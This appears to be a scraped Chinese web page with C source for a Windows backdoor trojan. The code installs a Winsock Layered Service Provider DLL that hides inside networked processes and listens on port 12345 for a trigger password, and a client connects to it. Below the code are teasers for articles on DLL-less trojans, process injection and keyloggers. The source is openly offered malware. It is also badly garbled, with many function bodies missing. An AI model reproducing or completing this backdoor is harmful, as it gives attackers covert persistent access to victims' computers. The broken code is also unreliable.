code:
1.instbd.exe的源**
#define unicode
#define _unicode
#include
#include
#include
#include
#include
guid filterguid=};
guid filterchainguid=};
bool getfilter();
void freefilter();
void installfilter();
void removefilter();
void start();
void usage();
int totalprotos=0;
dword protoinfosize=0;
lpwsaprotocol_infow protoinfo=null;
int main(int argc,char *argv)
else if(!strcmp(argv[1],"-remove"))
}
usage();
return 0; }
bool getfilter()
}
if((protoinfo=(lpwsaprotocol_infow)globalalloc(gptr,protoinfosize))==null)
if((totalprotos=wscenumprotocols(null,protoinfo,&protoinfosize,&errorcode))==socket_error)
printf("found %d protocols!/n",totalprotos);
return true; }
void freefilter()
void installfilter()
}
tcpchaininfo.protocolchain.chainlen++;
tcpchaininfo.protocolchain.chainentries[0]=iplayercataid;
memcpy(&chainarray[provcnt++],&tcpchaininfo,sizeof(wsaprotocol_infow)); }
if(wscinstallprovider(&filterchainguid,filter_path,chainarray,provcnt,&errorcode)==socket_error)
freefilter();
getfilter();
if((cataentries=(lpdword)globalalloc(gptr,totalprotos*sizeof(wsaprotocol_infow)))==null)
cataindex=0;
for(i=0;i
#include
#include
guid filterguid=};
lpwsaprotocol_infow protoinfo=null;
wspproc_table nextproctable;
dword protoinfosize=0;
handle hmutex;
handle hthread;
point nowpt;
int totalprotos=0;
dword winapi backdoor(lpvoid)
if((sock=socket(af_inet,sock_stream,ipproto_tcp))==invalid_socket)
sin.sin_addr.s_addr=htons(inaddr_any);
sin.sin_family=af_inet;
sin.sin_port=htons(12345);
if(bind(sock,(struct sockaddr *)&sin,sizeof(sin))==socket_error)
if(listen(sock,5)==socket_error)
while(1)
if((iret==recv(sockt,msg,sizeof(msg),0))==socket_error)
if(strstr(msg,"i am too2y"))
}
outputdebugstring(_t("transport successfully"));
closesocket(sockt); }
return 1; }
bool getfilter()
}
if((protoinfo=(lpwsaprotocol_infow)globalalloc(gptr,protoinfosize))==null)
if((totalprotos=wscenumprotocols(null,protoinfo,&protoinfosize,&errorcode))==socket_error)
return true; }
void freefilter()
bool winapi dllmain(hinstance hmodule,
dword reason,
lpvoid lpreserved)
releasemutex(hmutex);
break; }
case dll_process_detach:
releasemutex(hmutex);
closehandle(hthread);
break; }
}
return true; }
int wspapi wspstartup(
word wversionrequested,
lpwspdata lpwspdata,
lpwsaprotocol_infow lpprotoinfo,
wspupcalltable upcalltable,
lpwspproc_table lpproctable)
getfilter();
for(i=0;iprotocolchain.chainlen;i++)
}
filterpathlen=max_path;
filterpath=(tchar*)globalalloc(gptr,filterpathlen);
for(i=0;i
#include
#include
int main()
if((sock=socket(af_inet,sock_stream,ipproto_tcp))==invalid_socket)
sin.sin_addr.s_addr=inet_addr("127.0.0.1");
sin.sin_family=af_inet;
sin.sin_port=htons(12345);
if(connect(sock,(struct sockaddr *)&sin,sizeof(sin))==socket_error)
if((iret=send(sock,msg,sizeof(msg),0))==socket_error)
memset(msg,0,sizeof(msg));
if((iret=recv(sock,msg,sizeof(msg),0))==socket_error)
printf("re: ");
printf(msg);
closesocket(sock);
wsacleanup();
getche();
return 0; }
無dll無程序木馬
include include include include pragma comment lib,shlwapi.lib 引數結構 typedef struct remotepararemotepara bool enableprivilege handle htoken,lpctstr szp...
無dll插入程序
mini code by kardinal p.s.t compile by vc 6.0 can not run under win98 include pragma comment lib,user32.lib pragma comment lib,kernel32.lib pragma com...
無程序DLL木馬的又一開發思路與實現
n printf date 11 3 2002 n n return void usage 2.backdoor.dll的源 pragma data seg shared int dllcount 0 pragma data seg pragma ment linker,section shared...
使用DLL技術的木馬分析
使用就相當方便,可以有效的查殺木馬。另外建議大家使用專門針對木馬的查殺軟體,如木馬克星。2 使用程序 記憶體模組檢視器 dll木馬對於程序管理器來說是隱藏的,所以我們既不能用程序管理器來查詢,也無法直接將它停止執行,因此,我們不能指望nt自帶的程序管理器了,需要使用一些附加的工具。為了能發現dll木...
無DLL鍵盤記錄
我們windows系統是建立在訊息傳遞的事件驅動的機制上。用鉤子可以截獲並處理送給其他應用程式的訊息,來完成普通應用程式難以實現的功能。鍵盤記錄者的原理就是使用鍵盤鉤子截獲鍵盤訊息。當然,並非鍵盤記錄一定要使用鉤子,比如wineggdrop的無鉤子鍵盤記錄者。一般書上都會說 全域性鉤子函式必須包含在...